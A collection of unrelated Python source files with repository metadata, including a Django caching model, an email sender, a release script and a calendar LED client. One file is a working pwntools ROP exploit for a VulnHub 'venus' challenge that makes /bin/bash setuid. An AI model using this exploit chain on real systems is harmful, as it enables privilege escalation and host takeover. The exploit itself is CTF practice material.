| 29.630137 | 250 | 0.520573 | 285 | 2,163 | 3.785965 | 0.277193 | 0.027804 | 0.074143 | 0.061168 | 0.379981 | 0.317887 | 0.317887 | 0.266914 | 0.189064 | 0.189064 | 0 | 0.008584 | 0.353675 | 2,163 | 72 | 251 | 30.041667 | 0.763233 | 0.064263 | 0 | 0.163636 | 0 | 0.018182 | 0.162444 | 0.023845 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.072727 | 0 | 0.254545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373ce6abe69658df775573e30396ce08743e65d4 | 1,458 | py | Python | 2021/07/b.py | cj-wong/advent | f6a489773f488f5daf49caa9d652b1886608b928 | [
"MIT"
] | null | null | null | 2021/07/b.py | cj-wong/advent | f6a489773f488f5daf49caa9d652b1886608b928 | [
"MIT"
] | null | null | null | 2021/07/b.py | cj-wong/advent | f6a489773f488f5daf49caa9d652b1886608b928 | [
"MIT"
] | null | null | null | from collections import Counter, defaultdict
from typing import Dict, List
import config
def calculate_crab_pos_change_fuel(start: int, end: int) -> int:
"""Calculate the amount of fuel changed per position.
Args:
start (int): starting position
end (int): ending position
Returns:
int: the number of fuel consumed
"""
diff = abs(start - end)
return (diff * (diff + 1)) // 2
def calculate_min_crab_sub_fuel(contents: List[str]) -> int:
"""Calculate the minimum amount of fuel for the crab-subs.
Args:
contents (List[str]): the file contents
Returns:
int
"""
crab_pos = [int(pos) for pos in contents[0].split(',')]
fuel: Dict[int, int] = defaultdict(int)
count = Counter(crab_pos)
uniq_pos = set(crab_pos)
start = min(uniq_pos)
end = max(uniq_pos)
for u_pos in range(start, end + 1):
pos_fuel = [
calculate_crab_pos_change_fuel(pos, u_pos) * count[pos]
for pos in uniq_pos
]
fuel[u_pos] = sum(pos_fuel)
return min(fuel.values())
def main() -> None:
"""Run the main code."""
test_answer = 168
test_file = config.TestFile(test_answer)
test = calculate_min_crab_sub_fuel(test_file.contents)
test_file.test(test)
file = config.File()
result = calculate_min_crab_sub_fuel(file.contents)
config.LOGGER.info(result)
if __name__ == '__main__':
main()
| 23.516129 | 67 | 0.633059 | 201 | 1,458 | 4.368159 | 0.333333 | 0.039863 | 0.05467 | 0.06492 | 0.137813 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006464 | 0.257202 | 1,458 | 61 | 68 | 23.901639 | 0.804247 | 0.215364 | 0 | 0 | 0 | 0 | 0.008333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373f20855c48097a781ae0349231baa0bc6b5ae5 | 5,730 | py | Python | aplus_client/django/models.py | apluslms/a-plus-client | 21cf1575ef70baf6ece70d6ae99f7bcee554e9b1 | [
"MIT"
] | 1 | 2019-10-13T10:21:51.000Z | 2019-10-13T10:21:51.000Z | aplus_client/django/models.py | apluslms/a-plus-client | 21cf1575ef70baf6ece70d6ae99f7bcee554e9b1 | [
"MIT"
] | null | null | null | aplus_client/django/models.py | apluslms/a-plus-client | 21cf1575ef70baf6ece70d6ae99f7bcee554e9b1 | [
"MIT"
] | 1 | 2018-08-28T18:32:20.000Z | 2018-08-28T18:32:20.000Z | import datetime
from functools import reduce
from urllib.parse import urlsplit
from django.apps import apps
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
class ApiNamespace(models.Model):
domain = models.CharField(max_length=255, db_index=True)
class Meta:
abstract = apps.get_containing_app_config(__name__) is None
verbose_name = _("Namespace")
verbose_name_plural = _("Namespaces")
@classmethod
def get_by_url(cls, url):
hostname = urlsplit(url).hostname
if not hostname:
raise ValueError("Url doesn't have hostname")
obj, created = cls.objects.get_or_create(domain=hostname)
return obj
def __str__(self):
return self.domain
class CachedApiQuerySet(models.QuerySet):
def get_new_or_updated(self, api_obj, **kwargs):
obj, created = self.get_or_create(api_obj, **kwargs)
if not created and obj.should_be_updated:
self.update_object(obj, api_obj, **kwargs)
obj.save()
return obj
def get_or_create(self, api_obj, **kwargs):
select_related = kwargs.pop('select_related', None)
try:
qs = self
if select_related:
qs = qs.select_related(*select_related)
return qs.get(api_id=api_obj.id, **kwargs), False
except ObjectDoesNotExist:
return self.create(api_obj, **kwargs), True
def create(self, api_obj, **kwargs):
obj = self.model(api_id=api_obj.id)
self.update_object(obj, api_obj, **kwargs)
obj.save()
return obj
def update_object(self, obj, api_obj, **kwargs):
if not obj.url and api_obj.url:
obj.url = api_obj.url
obj.update_with(api_obj, **kwargs)
update_object.queryset_only = True
CachedApiManager = models.Manager.from_queryset(CachedApiQuerySet)
class CachedApiObject(models.Model):
TTL = datetime.timedelta(hours=1)
class Meta:
abstract = True
get_latest_by = 'updated'
api_id = models.IntegerField()
url = models.URLField()
updated = models.DateTimeField(auto_now=True)
@property
def should_be_updated(self):
age = timezone.now() - self.updated
return age > self.TTL
def update_using(self, client):
data = client.load_data(self.url)
self.update_with(data)
def update_with(self, api_obj, **kwargs):
fields = (
(f, f.name, f.related_model)
for f in self._meta.get_fields()
if (
f.concrete and (
not f.is_relation
or f.one_to_one
or (f.many_to_one and f.related_model)
) and
f.name not in ('id', 'url', 'updated')
)
)
for f, name, model in fields:
if name in kwargs:
setattr(self, name, kwargs[name])
continue
try:
value = api_obj[name]
except KeyError:
continue
if model:
value = model.objects.get_new_or_updated(value, **kwargs)
setattr(self, name, value)
class NamespacedApiQuerySet(CachedApiQuerySet):
def using_namespace(self, namespace):
if not isinstance(namespace, ApiNamespace):
namespace = ApiNamespace.get_by_url(namespace)
return self.filter(namespace=namespace)
def using_namespace_id(self, namespace_id):
return self.filter(namespace_id=namespace_id)
def get_new_or_updated(self, api_obj, **kwargs):
if 'namespace' not in kwargs:
kwargs['namespace'] = ApiNamespace.get_by_url(api_obj.url)
return super().get_new_or_updated(api_obj, **kwargs)
def update_object(self, obj, api_obj, namespace=None, **kwargs):
if namespace is None:
try:
namespace = obj.namespace
except ObjectDoesNotExist:
namespace = ApiNamespace.get_by_url(api_obj.url)
try:
obj.namespace
except ObjectDoesNotExist:
obj.namespace = namespace
super().update_object(obj, api_obj, namespace=namespace, **kwargs)
class NamespacedApiObject(CachedApiObject):
Manager = CachedApiManager.from_queryset(NamespacedApiQuerySet)
objects = Manager()
namespace = models.ForeignKey(ApiNamespace, on_delete=models.PROTECT)
class Meta:
abstract = True
unique_together = ('namespace', 'api_id')
def update_with(self, api_obj, **kwargs):
kwargs.setdefault('namespace', self.namespace)
super().update_with(api_obj, **kwargs)
class NestedApiQuerySet(CachedApiQuerySet):
@cached_property
def namespace_filter(self):
return self.model.NAMESPACE_FILTER
def filter(self, *args, **kwargs):
if 'namespace' in kwargs:
kwargs[self.namespace_filter] = kwargs.pop('namespace')
return super().filter(*args, **kwargs)
def get_new_or_updated(self, api_obj, **kwargs):
if 'namespace' not in kwargs:
kwargs['namespace'] = ApiNamespace.get_by_url(api_obj.url)
return super().get_new_or_updated(api_obj, **kwargs)
class NestedApiObject(CachedApiObject):
NAMESPACE_FILTER = None
Manager = CachedApiManager.from_queryset(NestedApiQuerySet)
objects = Manager()
class Meta:
abstract = True
@property
def namespace(self):
raise NotImplementedError("Subclass should define .namespace property")
| 31.311475 | 79 | 0.63822 | 671 | 5,730 | 5.247392 | 0.207154 | 0.044306 | 0.05453 | 0.031809 | 0.214996 | 0.158762 | 0.158762 | 0.127237 | 0.116444 | 0.106788 | 0 | 0.000956 | 0.269459 | 5,730 | 182 | 80 | 31.483516 | 0.840182 | 0 | 0 | 0.265734 | 0 | 0 | 0.03438 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125874 | false | 0 | 0.062937 | 0.020979 | 0.433566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373f799d97bc4aea9455aac2ae9a2ed13f94701c | 1,010 | py | Python | tests/changes/api/test_kick_sync_repo.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 443 | 2015-01-03T16:28:39.000Z | 2021-04-26T16:39:46.000Z | tests/changes/api/test_kick_sync_repo.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 12 | 2015-07-30T19:07:16.000Z | 2016-11-07T23:11:21.000Z | tests/changes/api/test_kick_sync_repo.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 47 | 2015-01-09T10:04:00.000Z | 2020-11-18T17:58:19.000Z | import json
import mock
from changes.config import db
from changes.testutils import APITestCase
class KickSyncRepoTest(APITestCase):
path = '/api/0/kick_sync_repo/'
def setUp(self):
self.repo = self.create_repo()
db.session.commit()
super(KickSyncRepoTest, self).setUp()
def test_simple(self):
with mock.patch('changes.api.kick_sync_repo.sync_repo.delay') as mocked:
resp = self.client.post(self.path, data={
'repository': self.repo.url,
})
assert resp.status_code == 200
assert mocked.call_count == 1
_, kwargs = mocked.call_args
assert kwargs['repo_id'] == self.repo.id.hex
assert kwargs['continuous'] is False
def test_not_found(self):
resp = self.client.post(self.path, data={
'repository': 'git@doesnotexist.com',
})
assert resp.status_code == 400
error = json.loads(resp.data)
assert 'repository' in error['problems']
| 29.705882 | 80 | 0.623762 | 124 | 1,010 | 4.959677 | 0.491935 | 0.039024 | 0.039024 | 0.058537 | 0.130081 | 0.130081 | 0.130081 | 0.130081 | 0 | 0 | 0 | 0.010724 | 0.261386 | 1,010 | 33 | 81 | 30.606061 | 0.813673 | 0 | 0 | 0.148148 | 0 | 0 | 0.137624 | 0.063366 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.111111 | false | 0 | 0.148148 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37401799ef8790b8796a6d77073cb66a40a6c746 | 1,350 | py | Python | send.py | b1tst0rm/pygsuite | 8884d85b3bf038c4e41b6447f0c20af6b1925044 | [
"MIT"
] | 1 | 2021-06-10T16:59:57.000Z | 2021-06-10T16:59:57.000Z | send.py | b1tst0rm/pygsuite | 8884d85b3bf038c4e41b6447f0c20af6b1925044 | [
"MIT"
] | null | null | null | send.py | b1tst0rm/pygsuite | 8884d85b3bf038c4e41b6447f0c20af6b1925044 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import smtplib
import ssl
import traceback
from email.message import EmailMessage
import csv
csv_name = input("Enter path to CSV: ")
with open(csv_name) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",")
for row in csv_reader:
title = row[0]
last_name = row[1]
org = row[2]
email = row[3]
body = (
"""
%s %s,
Thanks for signing up for our mailing list.
We're happy your organization, %s, has joined us.
Cheers,
Daniel Limanowski
"""
% (title, last_name, org)
)
msg = EmailMessage()
msg['Subject'] = ("%s %s - mailing list" % (title, last_name))
msg['From'] = "daniel@b1tst0rm.net"
msg['To'] = email
msg.set_content(body)
context = ssl.create_default_context()
try:
# Do NOT use STMP_SSL, it fails negotiating SSL versions.
# Instead use the starttls command to force encryption.
server = smtplib.SMTP('smtp-relay.gmail.com', 587)
server.set_debuglevel(1)
server.starttls(context=context)
server.send_message(msg)
server.quit()
print('Email sent!')
except Exception:
traceback.print_exc()
| 27 | 70 | 0.554074 | 159 | 1,350 | 4.603774 | 0.566038 | 0.036885 | 0.032787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012401 | 0.342963 | 1,350 | 49 | 71 | 27.55102 | 0.812852 | 0.094074 | 0 | 0 | 0 | 0 | 0.101678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.16129 | 0 | 0.16129 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37403c0b4b4f8c0a873678dc2513d03b98245665 | 609 | py | Python | falco/client_credentials.py | jasondellaluce/client-py | 694780796289fdd20f1588d06e66c5a1b52ecb26 | [
"Apache-2.0"
] | 20 | 2019-10-14T15:01:14.000Z | 2021-08-09T19:13:08.000Z | falco/client_credentials.py | jasondellaluce/client-py | 694780796289fdd20f1588d06e66c5a1b52ecb26 | [
"Apache-2.0"
] | 45 | 2019-10-14T14:55:30.000Z | 2022-02-11T03:27:37.000Z | falco/client_credentials.py | jasondellaluce/client-py | 694780796289fdd20f1588d06e66c5a1b52ecb26 | [
"Apache-2.0"
] | 11 | 2019-10-14T17:41:06.000Z | 2022-02-21T05:40:44.000Z | import grpc
def load_file(filepath):
with open(filepath, "rb") as f:
return f.read()
def get_grpc_channel_credentials(client_crt, client_key, ca_root):
"""Returns a ChannelCredentials object to use with the grpc channel
https://grpc.github.io/grpc/python/grpc.html#create-client-credentials
"""
root_certificates = load_file(ca_root)
private_key = load_file(client_key)
certificate_chain = load_file(client_crt)
return grpc.ssl_channel_credentials(
root_certificates=root_certificates, private_key=private_key, certificate_chain=certificate_chain,
)
| 27.681818 | 106 | 0.747126 | 82 | 609 | 5.256098 | 0.47561 | 0.074246 | 0.12529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165846 | 609 | 21 | 107 | 29 | 0.848425 | 0.223317 | 0 | 0 | 0 | 0 | 0.004367 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3741437c9d6eeb011b2b876a314bb32cbeb6caaf | 2,020 | py | Python | scripts/release.py | ydcjeff/api-extractor | 0c8b22d75f21d08c3e7601e1bf15a37963742516 | [
"MIT"
] | 1 | 2021-07-03T18:42:38.000Z | 2021-07-03T18:42:38.000Z | scripts/release.py | ydcjeff/api-extractor | 0c8b22d75f21d08c3e7601e1bf15a37963742516 | [
"MIT"
] | 1 | 2022-02-04T14:42:25.000Z | 2022-02-06T02:21:44.000Z | scripts/release.py | ydcjeff/api-extractor | 0c8b22d75f21d08c3e7601e1bf15a37963742516 | [
"MIT"
] | null | null | null | # pylint: skip-file
import json
import subprocess
import sys
import api_extractor
try:
from semver import VersionInfo
except ImportError:
raise ImportError(
'semver must be installed for release. `pip install semver`'
)
try:
import koloro
except ImportError:
raise ImportError(
'koloro must be installed for release. `pip install koloro`'
)
RELEASE_TYPES = ('major', 'minor', 'patch', 'prerelease')
run = subprocess.call
def main():
pre_id = sys.argv[1] if len(sys.argv) > 1 else 'rc'
print('Release types are: ', RELEASE_TYPES)
idx = int(input('Select release type (index): '))
target_version = str(
VersionInfo.parse(api_extractor.__version__).next_version(
RELEASE_TYPES[idx], pre_id
)
)
if not VersionInfo.isvalid(target_version):
raise ValueError(f'Invalid target version: {target_version}')
tag = f'v{target_version}'
yes = input(f'Releasing {tag}. Confirm? [y/N] ').lower()
if yes in ('yes', 'y'):
yes = True
elif yes in ('no', 'n'):
yes = False
else:
yes = False
if not yes:
return
print(koloro.cyan('Updating package version...'))
with open('package.json', 'r') as f:
pkg = json.load(f)
pkg['version'] = target_version
with open('package.json', 'w') as f:
json.dump(pkg, f)
print(koloro.cyan('Generating changelog...'))
run(['pnpm', 'changelog'])
print(koloro.cyan('Formatting...'))
run(['pnpm', 'fmt'])
changelogOk = input('Changelog generated. Does it look good? [y/N] ').lower()
if changelogOk in ('yes', 'y'):
changelogOk = True
elif changelogOk in ('no', 'n'):
changelogOk = False
else:
changelogOk = False
if not changelogOk:
return
print(koloro.cyan('Committing changes...'))
run(['git', 'add', '.'])
run(['git', 'commit', '-m', f'release: {tag}'])
print(koloro.cyan('Pushing to GitHub...'))
run(['git', 'tag', tag])
run(['git', 'push', 'origin', tag])
run(['git', 'push', '-u', 'origin', 'main'])
if __name__ == '__main__':
main()
| 21.263158 | 79 | 0.634653 | 265 | 2,020 | 4.743396 | 0.407547 | 0.062053 | 0.059666 | 0.052506 | 0.097056 | 0.055688 | 0.055688 | 0 | 0 | 0 | 0 | 0.001229 | 0.194554 | 2,020 | 94 | 80 | 21.489362 | 0.771358 | 0.008416 | 0 | 0.208955 | 0 | 0 | 0.287356 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.149254 | 0 | 0.19403 | 0.089552 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3743220aa5b97be4c5b07c94e92e07656a597733 | 674 | py | Python | Exercicios Curso Em Video Mundo 3/Exe_081.py | JorgeTranin/Python_Curso_Em_Video | be74c9301aafc055bdf883be649cb8b7716617e3 | [
"MIT"
] | null | null | null | Exercicios Curso Em Video Mundo 3/Exe_081.py | JorgeTranin/Python_Curso_Em_Video | be74c9301aafc055bdf883be649cb8b7716617e3 | [
"MIT"
] | null | null | null | Exercicios Curso Em Video Mundo 3/Exe_081.py | JorgeTranin/Python_Curso_Em_Video | be74c9301aafc055bdf883be649cb8b7716617e3 | [
"MIT"
] | null | null | null | '''
Exercício Python 081: Crie um programa que vai ler vários
números e colocar em uma lista. Depois disso, mostre:
A) Quantos números foram digitados.
B) A lista de valores, ordenada de forma decrescente.
C) Se o valor 5 foi digitado e está ou não na lista.
'''
lista = list()
while True:
lista.append(int(input('Digite um valor: ')))
n = str(input('Quer continuar? S/N: '))
if n in 'Nn':
break
lista.sort(reverse=True)
print(f'Voce digitou {len(lista)} Valores.')
print(f'Os valores em ordem decrecente são:{lista}')
if lista.count(5) == 0:
print('O valor 5 não esta na lista')
else:
print('O valor 5 foi digitado e esta na lista')
| 21.741935 | 57 | 0.675074 | 113 | 674 | 4.026549 | 0.628319 | 0.03956 | 0.046154 | 0.043956 | 0.083516 | 0.083516 | 0 | 0 | 0 | 0 | 0 | 0.014981 | 0.207715 | 674 | 30 | 58 | 22.466667 | 0.837079 | 0.376855 | 0 | 0 | 0 | 0 | 0.441463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
374483f15bf635d6c70ab7f2db45d14d34cefa97 | 1,327 | py | Python | vulnhub/venus/exploit_not_1337_version.py | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
] | 101 | 2020-03-09T17:40:47.000Z | 2022-03-31T23:26:55.000Z | vulnhub/venus/exploit_not_1337_version.py | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
] | 1 | 2021-11-09T13:39:40.000Z | 2021-11-10T19:15:04.000Z | vulnhub/venus/exploit_not_1337_version.py | datajerk/ctf-write-ups | 1bc4ecc63a59de7d924c7214b1ce467801792da0 | [
"MIT"
] | 31 | 2020-05-27T12:29:50.000Z | 2022-03-31T23:23:32.000Z | #!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./venus_messaging')
if args.REMOTE:
#p = remote('172.19.2.239',9080)
#port blocked? workaround: ssh -L 9080:localhost:9080 magellan@172.19.2.239
p = remote('localhost',9080)
libc = ELF('./libc.so.6')
# lame no ASLR
'''
# ldd /usr/bin/venus_messaging
linux-vdso.so.1 (0x00007ffff7fc9000)
libc.so.6 => /lib64/libc.so.6 (0x00007ffff7dee000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcb000)
'''
libc.address = 0x00007ffff7dee000
else:
p = remote('localhost',9080)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = 0x00007ffff7dc0000
fd = 0x4
command = b'chmod u+s /bin/bash'
pop_rdi = next(binary.search(asm('pop rdi; ret')))
pop_rsi = next(libc.search(asm('pop rsi; ret')))
pop_rdx_rcx_rbx = next(libc.search(asm('pop rdx; pop rcx; pop rbx; ret')))
payload = b''
payload += 0x418 * b'A'
payload += p64(pop_rdi)
payload += p64(fd)
payload += p64(pop_rsi)
payload += p64(binary.bss())
payload += p64(pop_rdx_rcx_rbx)
payload += p64(len(command))
payload += p64(0)
payload += p64(0)
payload += p64(binary.plt.recv)
payload += p64(pop_rdi)
payload += p64(binary.bss())
payload += p64(libc.sym.system)
p.sendlineafter(b'password:', b'loveandbeauty')
p.sendlineafter(b'processed:\n',payload)
sleep(0.1)
p.send(command)
p.stream()
| 25.519231 | 76 | 0.6948 | 212 | 1,327 | 4.283019 | 0.410377 | 0.132159 | 0.030837 | 0.019824 | 0.248899 | 0.169604 | 0 | 0 | 0 | 0 | 0 | 0.122432 | 0.119819 | 1,327 | 51 | 77 | 26.019608 | 0.654966 | 0.104748 | 0 | 0.235294 | 0 | 0 | 0.184263 | 0.030876 | 0 | 0 | 0.043825 | 0 | 0 | 1 | 0 | false | 0.029412 | 0.029412 | 0 | 0.029412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37495eaeb03f7a3a0e3a85e6649c760538db37b4 | 9,932 | py | Python | Blinkenlights/clients/cal.py | mbalasz/Blinkenlights | f95cb40fb6c9c078ed174a2b70e74f20084db124 | [
"Apache-2.0"
] | 3 | 2021-05-23T20:16:03.000Z | 2022-02-16T15:52:19.000Z | Blinkenlights/clients/cal.py | mbalasz/Blinkenlights | f95cb40fb6c9c078ed174a2b70e74f20084db124 | [
"Apache-2.0"
] | 2 | 2021-06-15T14:01:01.000Z | 2021-07-08T13:31:10.000Z | Blinkenlights/clients/cal.py | mbalasz/Blinkenlights | f95cb40fb6c9c078ed174a2b70e74f20084db124 | [
"Apache-2.0"
] | 7 | 2021-06-07T11:36:04.000Z | 2021-10-31T23:18:10.000Z | #!/usr/bin/python3
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# A script to upload a bunch of png files to the matrix.
import argparse
import arrow
import blinken
import clock
import ics
import os
import requests
import sys
import time
from PIL import Image, ImageColor, ImageDraw
def parse_args(args):
parser = argparse.ArgumentParser(
description='Draw an animated square rainbow.')
parser.add_argument('-v', '--verbose',
type=bool, default=False, action=argparse.BooleanOptionalAction,
help='Print data sent to / received from the board.')
parser.add_argument('-r', '--reset',
type=bool, default=True, action=argparse.BooleanOptionalAction,
help='Reset data stored on board before sending new data.')
parser.add_argument('-t', '--time',
type=int, default=1000, metavar='TIME',
help='Display each frame for TIME ms. (default: %(default)s)')
parser.add_argument('-g', '--gamma',
type=float, default=0.7, metavar='GAMMA',
help='Apply GAMMA correction to PNG. (default: %(default)s)')
parser.add_argument('-d', '--device',
type=str, default='/dev/ttyUSB0', metavar='DEVICE',
help='Use DEVICE to talk to board. (default: %(default)s)')
parser.add_argument('-s', '--speed',
type=int, default=115200, metavar='SPEED',
help='Connect serial device at SPEED bps. (default: %(default)s)')
parser.add_argument('-c', '--calendar',
type=str, metavar='CAL',
default=('https://calendar.google.com/calendar/ical/' +
os.environ.get('USER') + '%40google.com/public/basic.ics'),
help='File or URL to fetch an ICS-format calendar from.')
return parser.parse_args(args)
colours = {
'white': ImageColor.getrgb('#ffffff'),
'grey': ImageColor.getrgb('#3f3f3f'),
'red': ImageColor.getrgb('#ff0000'),
'orange': ImageColor.getrgb('#ff3f00'),
'yellow': ImageColor.getrgb('#ffff00'),
'green': ImageColor.getrgb('#00ff00'),
'cyan': ImageColor.getrgb('#007fff'),
'blue': ImageColor.getrgb('#0000ff'),
'purple': ImageColor.getrgb('#3f00ff'),
'pink': ImageColor.getrgb('#ff3f3f'),
}
rainbow = ['red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple']
def splash(bl):
buf = Image.new(mode='RGB', size=(16, 16))
draw = ImageDraw.Draw(buf)
# Splash animation is 210ms long.
# Hopefully 21s is enough time to load everything from calendar.
with bl.animation(210*100) as anim:
for shuf in reversed(range(7)):
r = rainbow.copy()
r = r[shuf:len(r)] + r[0:shuf]
for i, colour in enumerate(r):
draw.rectangle([(2*i)+1, 0, (2*i)+2, 15], colours[colour])
anim.frame_from_image(buf, 30)
class Box(object):
def __init__(self, n, begin, end):
self._n = n
self._begin = begin
self._end = end
self._events = []
def __bool__(self):
return bool(self._events)
def __len__(self):
return len(self._events)
def __iter__(self):
return self._events.__iter__()
def BeginsIn(self, event):
return event.begin >= self._begin and event.begin < self._end
def EndsIn(self, event):
return event.end > self._begin and event.end <= self._end
def AddEvent(self, event):
self._events.append(event)
def Fill(self, draw, colour):
x, y = divmod(self._n, 2)
draw.rectangle([(3*x)+1,(4*y)+1,(3*x)+2,(4*y)+3], colour)
class Cal(object):
def __init__(self, file_or_url, now=arrow.now()):
self._url = None
self._current_hour = None
if file_or_url.startswith('https://'):
self._last_fetch = None
self._url = file_or_url
self.RefreshCal()
else:
self._cal = ics.Calendar(open(file_or_url).read())
self.UpdateBoxes(now)
def RefreshCal(self):
if not self._url:
return
if self._last_fetch and self._last_fetch > arrow.now().shift(days=-1):
return
print(f'Fetching calendar data from {self._url} ... ',
end='', flush=True)
self._cal = ics.Calendar(requests.get(self._url).text)
self._last_fetch = arrow.now()
print('done.')
def Upcoming(self, start, end):
events = list(self._cal.timeline.overlapping(start, end))
sf, ef = start.format('HH:mm'), end.format('HH:mm')
print(f'Found {len(events)} upcoming events for period {sf} to {ef}.')
return events
def Boxes(self, start):
end = start.shift(hours=5, seconds=-1)
# Calendar events are quantized to 30 minute boxes.
# Grid shows current hour + next 4, 1h per column.
# List index == box position in grid, 10 boxes total.
boxes = []
for hour in range(5):
boxes.append(Box(2*hour,
begin=start.shift(hours=hour, minutes=0),
end=start.shift(hours=hour, minutes=30)))
boxes.append(Box(2*hour+1,
begin=start.shift(hours=hour, minutes=30),
end=start.shift(hours=hour+1, minutes=0)))
# Map upcoming events to boxes.
for event in self.Upcoming(start, end):
if event.all_day or event.end == start:
continue
in_event = False
for box in boxes:
if box.BeginsIn(event):
in_event = True
if in_event:
box.AddEvent(event)
if box.EndsIn(event):
in_event = False
return boxes
def UpdateBoxes(self, now):
self.RefreshCal()
if self._current_hour and self._current_hour == now.hour:
return
self._current_hour = now.hour
start = now.floor('hour')
self._boxes = self.Boxes(start)
def Draw(self, draw, now):
boxes = self._boxes
# Rules:
# - If in meeting now or <5 mins, grid should be red, otherwise blue
meeting_tests = [0]
if now.minute >= 25:
# In the 5 mins between 25 past and half past, test both box 0 and
# box 1 for the presence of meetings.
meeting_tests.append(1)
if now.minute >= 30:
meeting_tests.pop(0)
if now.minute >= 55:
meeting_tests.append(2)
grid_colour = colours['blue']
for boxno in meeting_tests:
if boxes[boxno]:
grid_colour = colours['red']
self._Grid(draw, grid_colour)
# - Upcoming events colour their related box cyan.
for box in boxes[1:]:
if box:
box.Fill(draw, colours['cyan'])
# - For first column, if currently in a meeting, box is orange.
# - If in second 30m of hour, box 0 is grey.
if now.minute >= 30:
boxes[0].Fill(draw, colours['grey'])
if boxes[1]:
boxes[1].Fill(draw, colours['orange'])
else:
if boxes[0]:
boxes[0].Fill(draw, colours['orange'])
# - TODO: If no meeting now and meeting in >1m, flash box for next meeting?
# - TODO: Different colours / patterns for >1 meeting in a box?
# - TODO: Different colour if event=yes? Not available with free/busy.
def _Grid(self, draw, colour):
# Lay out grid.
